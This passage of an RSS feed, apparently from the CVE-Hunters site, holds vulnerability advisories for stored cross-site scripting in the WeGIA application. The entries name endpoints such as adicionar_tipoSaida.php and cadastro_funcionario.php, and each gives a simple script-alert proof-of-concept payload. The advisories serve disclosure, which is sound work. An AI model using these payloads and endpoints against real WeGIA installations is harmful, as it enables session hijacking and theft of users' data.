&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Poc VulDB&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6697/image.png&amp;#34;
	width=&amp;#34;1875&amp;#34;
	height=&amp;#34;985&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6697/image_hu_82b56e56e1511981.png 480w, /p/cve-2025-6697/image_hu_96dbb15382131ebf.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;190&amp;#34;
		data-flex-basis=&amp;#34;456px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6697/image-1.png&amp;#34;
	width=&amp;#34;1884&amp;#34;
	height=&amp;#34;997&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6697/image-1_hu_a8c1f483e3ef6844.png 480w, /p/cve-2025-6697/image-1_hu_97a661a9facc76a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;188&amp;#34;
		data-flex-basis=&amp;#34;453px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6697/image-2.png&amp;#34;
	width=&amp;#34;1909&amp;#34;
	height=&amp;#34;987&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6697/image-2_hu_ca33285700be848f.png 480w, /p/cve-2025-6697/image-2_hu_6a491cc29a99a3e4.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;193&amp;#34;
		data-flex-basis=&amp;#34;464px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/BRqtS1octSQ&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/BRqtS1octSQ&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6697.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6697.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6698</title>
        <link>https://www.cvehunters.com/p/cve-2025-6698/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-6698/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6698-cross-site-scripting-xss-stored-endpoint-adicionar_tiposaidaphp-parameter-tipo&amp;#34;&amp;gt;CVE-2025-6698: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_tipoSaida.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6698&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6698&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_tipoSaida.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/matPat/adicionar_tipoSaida.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6698-cross-site-scripting-xss-stored-endpoint-adicionar_tiposaidaphp-parameter-tipo&amp;#34;&amp;gt;CVE-2025-6698: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_tipoSaida.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6698&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6698&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_tipoSaida.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/matPat/adicionar_tipoSaida.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;adicionar_tipoSaida.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Poc VulDBeeee&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; ;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6698/image.png&amp;#34;
	width=&amp;#34;1884&amp;#34;
	height=&amp;#34;988&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6698/image_hu_1a5d7d99e108196e.png 480w, /p/cve-2025-6698/image_hu_b87867b672dc8af6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;190&amp;#34;
		data-flex-basis=&amp;#34;457px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6698/image-1.png&amp;#34;
	width=&amp;#34;1840&amp;#34;
	height=&amp;#34;1004&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6698/image-1_hu_f50f1b60b1eb092b.png 480w, /p/cve-2025-6698/image-1_hu_4f105eec7cbf26e6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;183&amp;#34;
		data-flex-basis=&amp;#34;439px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6698/image-2.png&amp;#34;
	width=&amp;#34;1887&amp;#34;
	height=&amp;#34;994&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6698/image-2_hu_fb4627698ac6d751.png 480w, /p/cve-2025-6698/image-2_hu_e95ed4393ffc5db8.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;455px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/7P5YT5MwCjg&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/7P5YT5MwCjg&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6698.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6698.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6699</title>
        <link>https://www.cvehunters.com/p/cve-2025-6699/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-6699/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6699-cross-site-scripting-xss-stored-endpoint-cadastro_funcionariophp-parameter-cpf&amp;#34;&amp;gt;CVE-2025-6699: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;cadastro_funcionario.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6699&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6699&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;cadastro_funcionario.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/funcionario/cadastro_funcionario.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6699-cross-site-scripting-xss-stored-endpoint-cadastro_funcionariophp-parameter-cpf&amp;#34;&amp;gt;CVE-2025-6699: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;cadastro_funcionario.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6699&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6699&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;cadastro_funcionario.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/funcionario/cadastro_funcionario.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;cadastro_funcionario.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Poc VulDBeeee&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; ;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6699/image.png&amp;#34;
	width=&amp;#34;1857&amp;#34;
	height=&amp;#34;990&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6699/image_hu_353d8c63a12bb5cf.png 480w, /p/cve-2025-6699/image_hu_588c09aeb2830033.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;450px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
